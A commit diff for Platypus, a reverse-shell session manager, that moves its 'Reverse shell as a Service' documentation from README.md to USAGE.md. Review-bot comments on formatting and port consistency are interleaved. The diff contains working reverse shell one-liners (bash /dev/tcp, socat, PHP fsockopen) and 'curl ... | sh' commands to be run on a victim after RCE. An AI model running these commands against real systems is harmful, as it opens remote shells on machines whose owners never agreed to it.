[+] Update documents
WangYihang committed Jan 24, 2021
1 parent 2375f35 commit becb491
Showing 2 changed files with 23 additions and 20 deletions.
23 changes: 3 additions & 20 deletions README.md
Expand Up @@ -30,8 +30,6 @@ A modern multiple reverse shell sessions/clients manager via terminal written in
```
git clone https://github.com/WangYihang/Platypus
cd Platypus
go get -u github.com/go-bindata/go-bindata/...
go-bindata -pkg resource -o ./lib/util/resource/resource.go ./lib/runtime/...
go run platypus.go
```
![](figure/install.gif)
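Review bot: With the two go-bindata lines dropped from the install block, nothing in the README says that `./lib/util/resource/resource.go` is a generated file, so `go run platypus.go` on a fresh clone only works if that file is checked in at this commit. Please confirm it is committed, and add one line under the install block pointing to the rebuild step that this commit adds to USAGE.md, for anyone who edits `./lib/runtime/`.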
Expand Down Expand Up @@ -100,25 +98,10 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.174.132:8080
#### Upload file
![](./figure/upload.gif)

### Other useful feature
### Advanced [USAGE](./USAGE.md)

#### Reverse shell as a Service
> [USAGE](./USAGE.md)
> NOTICE: ONLY WORKS on *NIX
The command `bash -c "bash -i >/dev/tcp/8.8.8.8/1337 0>&1"` is the equivalent of `curl http://192.168.174.132:8080/8.8.8.8/1337 | sh`, this feature provides the capability to redirect new reverse shell to another ip and port with out type the boring reverse shell command.

If you just want to pop up a reverse shell to the listening port of platypus, the parameter (`8.8.8.8/1337`) can be omited, like this:
```bash
curl http://192.168.174.132:8080/ | sh
```
Once the command get executed, the reverse shell session will appear in platypus which is listening on `192.168.174.132:8080`.

#### RESTful API
> [USAGE](./USAGE.md)
> Demonstration is to be done.
* Reverse shell as a Service (RaaS)
* RESTful API

#### Using `VIM` in Reverse Shell (Only on `Linux`)
> Demonstration is to be done.
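Review bot: The "Using `VIM` in Reverse Shell" heading at the end of this hunk is a `####` that now sits directly under `### Advanced [USAGE](./USAGE.md)` after the two bullets, so it reads as part of the section that links out to USAGE.md even though its body is still "Demonstration is to be done." Give it its own `###` parent or move it above the Advanced section. The `*NIX` notice also no longer appears anywhere in the README; a short "(*NIX only)" on the RaaS bullet would keep that limitation visible to readers who never open USAGE.md.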
20 changes: 20 additions & 0 deletions USAGE.md
@@ -1,5 +1,7 @@
## Reverse shell as a Service

> NOTICE: ONLY WORKS when Platypus runs on *NIX
Platypus is able to multiplex the reverse shell listening port. Port 8080 can receive reverse shell client connection, also there is a Reverse Shell as a Service (RaaS) running on this port.

Assume that you have got an arbitrary RCE on the target application, but the target application will strip the non-alphabet letter like `&`, `>`. then this feature will be useful.
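Review bot: In the lines shown, the new `> NOTICE: ONLY WORKS when Platypus runs on *NIX` blockquote is followed immediately by the "Platypus is able to multiplex..." paragraph; without a blank line between them, Markdown's lazy continuation pulls that paragraph into the quote. Make sure a blank line separates the two. The paragraph below the notice still says "Port 8080" while the examples this commit adds under Quick start use `1.2.3.4:1337`; pick one port so the description and the examples agree.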
Expand All @@ -8,6 +10,17 @@ To archive this, all you need is to construct a URL that indicates the target.

### Quick start

The command `bash -c "bash -i >/dev/tcp/5.6.7.8/7331 0>&1"` is the equivalent of `curl http://1.2.3.4:1337/5.6.7.8/7331 | sh`, this feature provides the capability to redirect new reverse shell to another ip and port with out type the boring reverse shell command.

If you just want to pop up a reverse shell to the listening port of platypus, the parameter (`1.2.3.4/1337`) can be omited, like this:

```bash
curl http://1.2.3.4:1337/ | sh
```

Once the command get executed, the reverse shell session will appear in platypus which is listening on `1.2.3.4:1337`.


1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
2. Execute `curl http://1.2.3.4:1337 | sh` on the victim machine
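Review bot: The second added paragraph says the parameter (`1.2.3.4/1337`) can be omitted, but the path parameter in the sentence above it is `5.6.7.8/7331`; `1.2.3.4:1337` is the Platypus listener itself. This looks like a substitution slip from moving the text out of the README, where the parameter and the example matched (`8.8.8.8/1337`). Change it to `5.6.7.8/7331`, and fix "omited" and "with out type" while here. The new paragraphs also end on the same `curl http://1.2.3.4:1337/ | sh` command as existing step 2, so consider folding them into the numbered steps instead of placing them ahead of the list.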

Expand All @@ -31,6 +44,13 @@ Currently, platypus support `awk`, `bash`, `go`, `Lua`, `NC`, `Perl`, `PHP`, `py
php -r '$sock=fsockopen("__HOST__",__PORT__);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
```

Then you should run the following command at Platypus project directory and rebuild Platypus.

```bash
go get -u github.com/go-bindata/go-bindata/...
go-bindata -pkg resource -o ./lib/util/resource/resource.go ./lib/runtime/...
```

## RESTful API

* `GET /client` List all online clients
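Review bot: `go get -u github.com/go-bindata/go-bindata/...` in the added block installs whatever go-bindata version is latest at the time, and `-u` also upgrades its dependencies, so the generator that writes `./lib/util/resource/resource.go` can differ from one rebuild to the next. Pin the tool to a tagged release so the generated file is reproducible. The lead-in sentence also says "and rebuild Platypus" but the block stops after `go-bindata`; add the build command and state when this step is needed (after changing files under `./lib/runtime/`).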
